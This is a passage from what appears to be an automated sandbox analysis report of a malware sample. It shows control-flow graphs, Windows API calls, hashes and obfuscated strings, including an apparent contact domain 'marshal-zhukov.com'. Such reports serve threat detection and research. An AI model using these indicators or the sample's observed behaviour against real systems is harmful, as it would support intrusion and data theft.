• _free.LIBCMT ref: 00F62DD5
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
• _free.LIBCMT ref: 00F62DE8
• _free.LIBCMT ref: 00F62DF9
• _free.LIBCMT ref: 00F62E0A
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
• Instruction ID: cbf15a8db23bfed0f43eb8ecd8a3a98e53ff0e54d82640f23c8a9c4b1b90513c
• Opcode Fuzzy Hash: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
• Instruction Fuzzy Hash: 57E0BF714001689E8711AF25FC028F63B75E7887207514027F414A2232C7B5165DFFD1
APIs
Strings
• pyi-, xrefs: 00F5438B
• Failed to convert Wflag %s using mbstowcs (invalid multibyte string), xrefs: 00F544DA
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _mbstowcs
• String ID: Failed to convert Wflag %s using mbstowcs (invalid multibyte string)$pyi-
• API String ID: 686213805-3625900369
• Opcode ID: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
• Instruction ID: fa3554216c446def08ab37fcb0b8a6d9cd0deafa84d4ecbccc4e2728118b1d6d
• Opcode Fuzzy Hash: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
• Instruction Fuzzy Hash: 6341E8B69403006BD754EF64EC47F6637A8AB0031AF440950FF0497293EABDB55CB7A2

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:35.4%
                                                                                                                      Total number of Nodes:96
                                                                                                                      Total number of Limit Nodes:5
execution_graph 19106 439e03 19107 439e30 19106->19107 19107->19107 19108 439e5d SysAllocString 19107->19108 19109 439ef0 19108->19109 19109->19109 19110 439f17 SysAllocString 19109->19110 19112 439f3a 19110->19112 19111 439fc7 VariantInit 19123 43a030 19111->19123 19112->19111 19113 43a2df SysFreeString SysFreeString 19112->19113 19114 43a2eb SysFreeString SysFreeString 19112->19114 19115 43a232 VariantClear 19112->19115 19116 43a334 19112->19116 19112->19123 19127 43a2be 19112->19127 19113->19114 19114->19127 19115->19123 19130 43d3c0 19116->19130 19121 43a265 SysFreeString 19121->19123 19122 43a39e 19125 43a3c0 19122->19125 19122->19127 19135 43d820 19122->19135 19139 43d6c0 19122->19139 19143 43d8c0 19122->19143 19123->19113 19123->19114 19123->19115 19123->19116 19123->19121 19123->19122 19124 43a29d GetVolumeInformationW 19123->19124 19123->19125 19123->19127 19124->19116 19124->19122 19124->19123 19124->19125 19124->19127 19125->19127 19133 440600 LdrInitializeThunk 19125->19133 19126 43a342 19126->19122 19134 440600 LdrInitializeThunk 19126->19134 19131 43d3e0 19130->19131 19131->19131 19132 43d411 RtlAllocateHeap 19131->19132 19132->19126 19133->19127 19134->19122 19136 43d88e 19135->19136 19137 43d82f 19135->19137 19136->19122 19137->19136 19151 440600 LdrInitializeThunk 19137->19151 19140 43d77e 19139->19140 19141 43d6d2 19139->19141 19140->19122 19141->19140 19152 440600 LdrInitializeThunk 19141->19152 19144 43d942 19143->19144 19145 43d8d6 19143->19145 19144->19122 19145->19144 19148 43d93e 19145->19148 19153 440600 LdrInitializeThunk 19145->19153 19147 43da2e 19147->19144 19147->19147 19155 440600 LdrInitializeThunk 19147->19155 19148->19147 19154 440600 LdrInitializeThunk 19148->19154 19151->19136 19152->19140 19153->19148 19154->19147 19155->19144 19174 40d330 19176 40d33c 19174->19176 19175 40d596 ExitProcess 19176->19175 19177 40d55f 19176->19177 19181 40d546 ShellExecuteW 19176->19181 19178 40d591 19177->19178 19179 40d568 GetCurrentThreadId GetInputState 19177->19179 19197 440550 19178->19197 19182 40d578 GetCurrentProcessId 19179->19182 19183 40d57e 19179->19183 19181->19177 19182->19183 19183->19178 19187 411210 CoInitialize 19183->19187 19188 411231 CoInitializeSecurity 19187->19188 19189 41139d 19187->19189 19188->19189 19190 411253 19188->19190 19191 41250a CoUninitialize 19189->19191 19200 439bf0 19190->19200 19193 40d58c 19191->19193 19196 40fe50 FreeLibrary 19193->19196 19196->19178 19205 441820 19197->19205 19199 440555 FreeLibrary 19199->19175 19203 439c60 19200->19203 19201 439caa 19204 439cbe CoCreateInstance 19201->19204 19202 439cf0 CoCreateInstance 19202->19203 19203->19201 19203->19202 19203->19203 19203->19204 19204->19202 19206 441829 19205->19206 19206->19199 19156 43d442 19157 43d4c2 19156->19157 19158 43d450 RtlFreeHeap 19156->19158 19158->19157 19160 443880 19161 4438a0 19160->19161 19161->19161 19162 4439de 19161->19162 19164 440600 LdrInitializeThunk 19161->19164 19164->19162 19207 440570 19208 44058a 19207->19208 19209 4405d9 19207->19209 19211 4405e4 19207->19211 19208->19211 19212 4405c4 RtlReAllocateHeap 19208->19212 19210 43d3c0 RtlAllocateHeap 19209->19210 19213 4405df 19210->19213 19212->19211 19165 439d4b 19166 439d90 19165->19166 19166->19166 19167 439da6 SysAllocString 19166->19167 19168 439dcf 19167->19168 19169 44082d 19170 440880 19169->19170 19171 440d28 19170->19171 19173 440600 LdrInitializeThunk 19170->19173 19173->19171 19219 44101e 19221 440f8d 19219->19221 19220 441076 19221->19219 19221->19220 19224 440600 LdrInitializeThunk 19221->19224 19223 441097 19224->19223 19225 439ddf CoSetProxyBlanket 19226 440719 19227 440730 19226->19227 19227->19227 19228 4407e4 GetForegroundWindow 19227->19228 19229 4407f2 19228->19229

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
control_flow_graph 0 439e03-439e22 1 439e30-439e5b 0->1 1->1 2 439e5d-439ee7 SysAllocString 1->2 3 439ef0-439f15 2->3 3->3 4 439f17-439f3f SysAllocString 3->4 6 43a243-43a251 4->6 7 439f80-439f9c 4->7 8 43a180 4->8 9 439fc7-43a022 VariantInit 4->9 10 43a207-43a20d call 40cbe0 4->10 11 439f46-439f4a 4->11 12 43a2c6-43a2d8 4->12 13 43a186-43a192 4->13 14 43a14c-43a155 4->14 15 43a110-43a145 4->15 16 43a210-43a216 call 40cbe0 4->16 17 43a097-43a0ab 4->17 18 439f54 4->18 19 43a25b-43a2b7 SysFreeString call 442e20 GetVolumeInformationW 4->19 20 439f5a-439f7a 4->20 21 43a199 4->21 22 43a21f-43a224 4->22 23 43a2df-43a2e9 SysFreeString * 2 4->23 24 43a15c 4->24 25 43a19c-43a1bd call 432bd0 4->25 26 43a1e0-43a1ed 4->26 27 439fa6-439fc0 4->27 28 43a2eb-43a2f5 SysFreeString * 2 4->28 29 43a169 4->29 30 43a232-43a23f VariantClear 4->30 31 43a230 4->31 32 43a170-43a179 4->32 33 43a1f4-43a200 4->33 34 43a2be-43a2c5 4->34 6->19 51 439fa0 7->51 8->13 45 43a030-43a066 9->45 10->16 11->18 12->8 12->13 12->21 12->23 12->25 12->26 12->32 12->33 12->34 35 43a4c2 12->35 36 43a561-43a575 call 43d8c0 12->36 37 43a3c0-43a3d6 call 43d430 12->37 38 43a500-43a52d call 43d6a0 12->38 39 43a4a0-43a4bb call 43d820 12->39 40 43a4c8-43a4f5 call 43d6a0 12->40 41 43a32d-43a32f 12->41 42 43a533-43a55a call 43d6c0 12->42 43 43a334-43a354 call 43d3c0 12->43 44 43a47b-43a48e 12->44 13->21 13->25 13->26 13->33 13->35 13->36 13->37 13->38 13->39 13->40 13->41 13->42 13->43 13->44 14->8 14->10 14->12 14->13 14->14 14->15 14->16 14->19 14->21 14->22 14->23 14->24 14->25 14->26 14->28 14->29 14->30 14->31 14->32 14->33 14->34 14->35 14->37 14->38 14->39 14->40 14->41 14->42 14->43 14->44 15->8 15->10 15->12 15->13 15->14 15->16 15->19 15->21 15->22 15->23 15->24 15->25 15->26 15->28 15->29 15->30 15->31 15->32 15->33 15->34 15->35 15->37 15->38 15->40 15->41 15->43 15->44 16->22 46 43a0e1-43a109 call 40cbd0 call 429b10 17->46 47 43a0ad-43a0b2 17->47 18->20 19->8 19->12 19->13 19->21 19->25 19->26 19->32 19->33 19->34 19->35 19->36 19->37 19->38 19->39 19->40 19->41 19->42 19->43 19->44 20->7 21->25 22->31 23->28 24->29 76 43a1c0-43a1c8 25->76 26->26 26->33 26->35 26->36 26->37 26->38 26->39 26->40 26->41 26->42 26->43 26->44 27->6 27->8 27->9 27->10 27->12 27->13 27->14 27->15 27->16 27->17 27->19 27->21 27->22 27->23 27->24 27->25 27->26 27->28 27->29 27->30 27->31 27->32 27->33 27->34 27->41 27->43 28->41 29->32 30->6 31->30 32->8 32->13 32->21 32->25 32->26 32->33 32->35 32->36 32->37 32->38 32->39 32->40 32->41 32->42 32->43 32->44 33->8 33->10 33->13 33->21 33->25 33->26 33->32 33->33 33->34 33->35 33->36 33->37 33->38 33->39 33->40 33->41 33->42 33->43 33->44 36->39 87 43a3e0-43a3f2 37->87 38->42 39->35 39->36 39->37 39->38 39->40 39->42 40->38 58 43a440-43a447 41->58 42->36 42->39 85 43a360-43a372 43->85 44->35 44->36 44->37 44->38 44->39 44->40 44->42 45->45 54 43a068-43a076 45->54 46->8 46->10 46->12 46->13 46->14 46->15 46->16 46->19 46->21 46->22 46->23 46->24 46->25 46->26 46->28 46->29 46->30 46->31 46->32 46->33 46->34 46->35 46->37 46->41 46->43 46->44 56 43a0c0-43a0c4 47->56 51->27 80 43a07a-43a090 54->80 72 43a0c6-43a0cf 56->72 73 43a0b4 56->73 82 43a0d1-43a0d4 72->82 83 43a0d6-43a0da 72->83 81 43a0b5-43a0be 73->81 76->76 86 43a1ca-43a1d4 76->86 80->8 80->10 80->12 80->13 80->14 80->15 80->16 80->17 80->19 80->21 80->22 80->23 80->24 80->25 80->26 80->28 80->29 80->30 80->31 80->32 80->33 80->34 80->37 80->41 80->43 81->46 81->56 82->81 83->81 89 43a0dc-43a0df 83->89 85->85 91 43a374-43a37f 85->91 86->26 86->33 86->35 86->36 86->37 86->38 86->39 86->40 86->41 86->42 86->43 86->44 87->87 92 43a3f4-43a3fc 87->92 89->81 94 43a381-43a389 91->94 95 43a3ac-43a3b9 91->95 96 43a43a-43a43e 92->96 97 43a3fe-43a409 92->97 99 43a390-43a397 94->99 95->35 95->36 95->37 95->38 95->39 95->40 95->42 95->44 96->58 100 43a410-43a417 97->100 101 43a3a0-43a3a6 99->101 102 43a399-43a39c 99->102 103 43a420-43a426 100->103 104 43a419-43a41c 100->104 101->95 106 43a448-43a474 call 440600 101->106 102->99 105 43a39e 102->105 103->96 108 43a428-43a437 call 440600 103->108 104->100 107 43a41e 104->107 105->95 106->35 106->36 106->37 106->38 106->39 106->40 106->42 106->44 107->96 108->96
                                                                                                                      APIs
                                                                                                                      • SysAllocString.OLEAUT32(8FDF8923), ref: 00439E62
                                                                                                                      • SysAllocString.OLEAUT32(8FDF8923), ref: 00439F18
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString
                                                                                                                      • String ID: "_kQ$1[!]$9k?m$bS3U$hKpM$i?y1$i?y1$l3u5$lo$q7bI
                                                                                                                      • API String ID: 2525500382-2291679449
                                                                                                                      • Opcode ID: 3f84ddf9d68db4cfd429c7386c9fa6934f0b9a5841c78f71d6627337152d25ec
                                                                                                                      • Instruction ID: 0f33f5176dd057a132bed2c5aac49cb092b48a7f49199e5d7c126567dc2015bb
                                                                                                                      • Opcode Fuzzy Hash: 3f84ddf9d68db4cfd429c7386c9fa6934f0b9a5841c78f71d6627337152d25ec
                                                                                                                      • Instruction Fuzzy Hash: B302ED79A08300DFD3049F24E885B6BB7E5FFCA315F14882DF4858B291D779A81ACB56

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 113 411210-41122a CoInitialize 114 411231-41124c CoInitializeSecurity 113->114 115 4113b0 113->115 116 41139d-4113a2 113->116 117 411253-411279 call 439bf0 114->117 118 4113b2 114->118 115->118 116->115 123 411280-4112c7 117->123 119 41250a-412510 CoUninitialize 118->119 122 412512-412519 119->122 123->123 124 4112c9-41133b 123->124 125 411340-41136b 124->125 125->125 126 41136d-41137e 125->126 127 411380-41138f 126->127 128 4113b7-4113bb 126->128 130 411390-411399 127->130 129 4113bf-4113c7 128->129 131 4113c9-4113ca 129->131 132 4113db-4113e8 129->132 130->130 133 41139b 130->133 134 4113d0-4113d9 131->134 135 41140b-411413 132->135 136 4113ea-4113f1 132->136 133->129 134->132 134->134 138 411415-411416 135->138 139 41142b-411569 135->139 137 411400-411409 136->137 137->135 137->137 140 411420-411429 138->140 141 411570-4115c8 139->141 140->139 140->140 141->141 142 4115ca-4115ff 141->142 143 411600-411631 142->143 143->143 144 411633-411674 call 40fe60 143->144 147 411700 144->147 148 411710-411719 call 403d70 144->148 149 411702-411709 144->149 150 411684-4116ac GetSystemDirectoryW 144->150 151 41167b-41167d 144->151 147->149 148->119 149->118 149->147 149->148 149->149 149->150 149->151 153 4116b3 150->153 154 4116ae-4116b1 150->154 151->150 156 4116b4-4116bc 153->156 154->153 154->156 157 4116c3 156->157 158 4116be-4116c1 156->158 159 4116c4-4116f4 call 40cbd0 call 43a6b0 call 43d430 157->159 158->157 158->159 159->147
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00411221
                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411243
                                                                                                                      • CoUninitialize.COMBASE ref: 0041250A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize$SecurityUninitialize
                                                                                                                      • String ID: '676$2 />$2,/&$6910431D5D6F41B70608286674507D91$N967$dc$marshal-zhukov.com$uy
                                                                                                                      • API String ID: 3757020523-386217003
                                                                                                                      • Opcode ID: 7b7ab738a5cf8cdd31bd884001b1d08f61c0211879b15022554c4b45fb3b2319
                                                                                                                      • Instruction ID: a48284d29e9631185903a87ed17f6b227f394860366b5a2ac340633ba54a95c6
                                                                                                                      • Opcode Fuzzy Hash: 7b7ab738a5cf8cdd31bd884001b1d08f61c0211879b15022554c4b45fb3b2319
                                                                                                                      • Instruction Fuzzy Hash: 29C1E0B564C3919BD370CF259881BDBBBE1EB96310F18892DD4D88B392D7394806CB96

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 166 40f882-40faaf 167 40fab0-40fac7 166->167 167->167 168 40fac9-40fad4 167->168 169 40fad7-40fade 168->169 170 40fca0-40fcb2 169->170 171 40fba1-40fba7 169->171 172 40fae5-40fae9 169->172 173 40fba9-40fbbf 169->173 174 40fc7b-40fc99 169->174 175 40fcbb 169->175 176 40fcfc 169->176 177 40fcdd-40fce9 169->177 178 40faee-40fb87 call 40cb30 169->178 179 40fb8e-40fb9a 169->179 170->175 180 40fbe8-40fc08 171->180 182 40fceb-40fcf4 172->182 181 40fbc0-40fbe2 173->181 174->170 174->175 175->177 177->182 178->170 178->171 178->173 178->174 178->175 178->176 178->177 178->179 179->170 179->171 179->173 179->174 179->175 179->176 187 40fc10-40fc51 180->187 181->181 185 40fbe4-40fbe6 181->185 182->176 185->180 187->187 190 40fc53-40fc74 187->190 190->170 190->174 190->175 190->176
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5C1A$A?=$FsOq$G+)$PG8E$UwOu$W/[-$Y3G1$]kQi$`_l]$a7]5$dS`Q$l[zY$sKuI
                                                                                                                      • API String ID: 0-3170360268
                                                                                                                      • Opcode ID: 01935e236d4e2d5ca6a53654527dfc5a5fb418dcb0cdf122a0998de2afce7c2b
                                                                                                                      • Instruction ID: 0c74cb9e6d9683c85258a1eaff13ec23cf88813475e3750d48fb34ca779fcadf
                                                                                                                      • Opcode Fuzzy Hash: 01935e236d4e2d5ca6a53654527dfc5a5fb418dcb0cdf122a0998de2afce7c2b
                                                                                                                      • Instruction Fuzzy Hash: 23B154B5100B40CFE324CF25C89279BBBE2FB55314F148A2CE5AB8B690DB74A446CF45

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 193 40d330-40d33e call 43ee60 196 40d344-40d35f 193->196 197 40d596-40d598 ExitProcess 193->197 198 40d360-40d382 196->198 198->198 199 40d384-40d404 198->199 200 40d410-40d45a 199->200 200->200 201 40d45c-40d46f 200->201 202 40d475-40d4b6 201->202 203 40d55f-40d566 call 437570 201->203 204 40d4c0-40d4f3 202->204 209 40d591 call 440550 203->209 210 40d568-40d576 GetCurrentThreadId GetInputState 203->210 204->204 206 40d4f5-40d51f 204->206 208 40d520-40d544 206->208 208->208 212 40d546-40d559 ShellExecuteW 208->212 209->197 213 40d578 GetCurrentProcessId 210->213 214 40d57e-40d585 call 40e520 210->214 212->203 213->214 214->209 217 40d587 call 411210 214->217 219 40d58c call 40fe50 217->219 219->209
                                                                                                                      APIs
                                                                                                                      • ShellExecuteW.SHELL32(00000000,19AA1BAD,004473DA,?,00000000,00000005), ref: 0040D559
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040D568
                                                                                                                      • GetInputState.USER32 ref: 0040D56E
                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D578
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D598
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$ExecuteExitInputShellStateThread
                                                                                                                      • String ID: /KjM$@C$dc$}O+A
                                                                                                                      • API String ID: 288744916-4249039376
                                                                                                                      • Opcode ID: 325933621e40d8b8d9436bdf2174ccf44da36203a8cf2298e4bcc684bfa02207
                                                                                                                      • Instruction ID: b0541360ae2b64190384122f8a4b8c1e9bcb0c968cf5f3129e2bd2afac22441e
                                                                                                                      • Opcode Fuzzy Hash: 325933621e40d8b8d9436bdf2174ccf44da36203a8cf2298e4bcc684bfa02207
                                                                                                                      • Instruction Fuzzy Hash: 6E516571A5C3005BD30CDF65CC5576BBAE29BC5708F04D87DA685DB2C1EB7888068B8A

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 230 439bf0-439c54 231 439c60-439c85 230->231 231->231 232 439c87-439ca3 231->232 234 439cb0 232->234 235 439cf0-439d33 CoCreateInstance 232->235 236 439caa 232->236 237 439d3f-439d44 232->237 238 439cbe-439ce7 CoCreateInstance 232->238 234->238 235->237 236->234 237->234 237->235 237->236 237->237 237->238 238->235
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5202720c2f036047dc9b756f8f30debdf675b11aadd7bbad5fdf7d6fa87505eb
                                                                                                                      • Instruction ID: 99db50029e9be6752580d46d303db5ca9f103b376aad5169e6ee161556f02837
                                                                                                                      • Opcode Fuzzy Hash: 5202720c2f036047dc9b756f8f30debdf675b11aadd7bbad5fdf7d6fa87505eb
                                                                                                                      • Instruction Fuzzy Hash: 62316474158740AFF3008F55D948B4BBBE4EB86B05F10892DF694AA290C7B99908CF9B

                                                                                                                      Control-flow Graph

control_flow_graph 269 440600-440632 LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(00443BA2,005C003F,00000002,00000018,?), ref: 0044062E
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
• Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Control-flow Graph
control_flow_graph 271 44082d-440873 272 440880-4408b0 271->272 272->272 273 4408b2-4408be 272->273 274 4408c0-4408c4 273->274 275 4408e1-440c4b call 43ec00 273->275 277 4408d0-4408df 274->277 280 440c61-440cc5 275->280 281 440c4d 275->281 277->275 277->277 283 440cd0-440cf5 280->283 282 440c50-440c5f 281->282 282->280 282->282 283->283 284 440cf7-440d02 283->284 285 440d04-440d0f 284->285 286 440d4f-440d68 284->286 287 440d10-440d17 285->287 288 440d19-440d26 287->288 289 440d2a-440d30 287->289 288->287 290 440d28 288->290 289->286 291 440d32-440d47 call 440600 289->291 290->286 293 440d4c 291->293 293->286
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 328e5bc532d5bb4fb304c21ed20fbd052a0cae81ad7fa653924ff17c9a6d0f18
• Instruction ID: 678d0e188adab1d5500fadea400446abedbc663d0db3939ff0fd71b1963abac5
• Opcode Fuzzy Hash: 328e5bc532d5bb4fb304c21ed20fbd052a0cae81ad7fa653924ff17c9a6d0f18
• Instruction Fuzzy Hash: F041F0745083428BE708DF14C49126BB7F2FFC6304F14491EE1C18B2A0E779C91ACB9A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: 01
• API String ID: 0-3477152822
• Opcode ID: 99af49e7e6929860ae38d849f9117ce2c28b81cedbf8253e612d591faa750a2a
• Instruction ID: 78b3c5e0676231c38cd4605f4b388ec8c79a0720ff071878e1746d55816391af
• Opcode Fuzzy Hash: 99af49e7e6929860ae38d849f9117ce2c28b81cedbf8253e612d591faa750a2a
• Instruction Fuzzy Hash: 4B31CB741183419BE714CF25C890ABBB7F0FF86708F04891CF9869B290EB748945CB5A
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd532eb7a17253d19b88c1acda108e62323a713565142c17b70a4033e7d8cfdd
• Instruction ID: 3fecb3c509470740bee7bdbf72550d9fe83e400ddcc0ba0c7b2fb13a490dde12
• Opcode Fuzzy Hash: cd532eb7a17253d19b88c1acda108e62323a713565142c17b70a4033e7d8cfdd
• Instruction Fuzzy Hash: 61112C3460864157F3115B24CC45737B7D2EB9B725F64582FE184973A1C37DC885C75A

Control-flow Graph
control_flow_graph 239 43d442-43d449 240 43d4c2-43d4c8 239->240 241 43d450-43d46a 239->241 242 43d470-43d499 241->242 242->242 243 43d49b-43d4b2 RtlFreeHeap 242->243 243->240
APIs
• RtlFreeHeap.NTDLL(?,00000000), ref: 0043D4A7
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: ccc46a3820b10345fc24cd63001c7ab07fbaf0123408abc039a2ae43fef11ea0
• Instruction ID: 1c16604aae1155129467535911cc151fb7d307c800175087f761eb098441637a
• Opcode Fuzzy Hash: ccc46a3820b10345fc24cd63001c7ab07fbaf0123408abc039a2ae43fef11ea0
• Instruction Fuzzy Hash: 3AF0223A3563508BD3048BA8ECA076A7B92DFDA719F28817DD5C48B6A1C7B59811C382

Control-flow Graph
control_flow_graph 244 440570-440583 245 4405e4-4405ed call 43d430 244->245 246 440598-4405a9 244->246 247 4405d9-4405e3 call 43d3c0 244->247 248 44058a-440591 244->248 255 4405ef-4405f3 245->255 249 4405b0-4405c2 246->249 248->245 248->246 249->249 252 4405c4-4405d7 RtlReAllocateHeap 249->252 252->255
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 004405D1
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: f02fbea22e2f1fecda0fbe97150a80e4dce3797cd52e50948bf4926b8f36c52f
• Instruction ID: 9f33d7cd772fb8c8d349ea5c543c91de8ed9321a1ce8ce1756a76ed8757ee429
• Opcode Fuzzy Hash: f02fbea22e2f1fecda0fbe97150a80e4dce3797cd52e50948bf4926b8f36c52f
• Instruction Fuzzy Hash: AC0178B0B093018BE3149F35FD5672B37A6EBD9301F08993CE5C042201DB39A86ADA52

Control-flow Graph
control_flow_graph 256 439d4b-439d84 257 439d90-439da4 256->257 257->257 258 439da6-439dcb SysAllocString 257->258 259 439dcf-439dd4 258->259
APIs
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: 466cf1c0b300e9601f0207c7ac9956b4fca475642fe190e5ad588be647a22d04
• Instruction ID: ea566c1fd506d3c3c4a31fb516f702cb4fc5e1c4ed8b9d2d4bc3451663e8c17f
• Opcode Fuzzy Hash: 466cf1c0b300e9601f0207c7ac9956b4fca475642fe190e5ad588be647a22d04
• Instruction Fuzzy Hash: 100128740083419FD250CF2A9918A1FBBF4EBD6724F108E1CF0D99B292D7749506CF86

Control-flow Graph
control_flow_graph 260 43d3c0-43d3d2 261 43d3e0-43d40f 260->261 261->261 262 43d411-43d427 RtlAllocateHeap 261->262
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,080B0A0D,0044445F,?), ref: 0043D41D
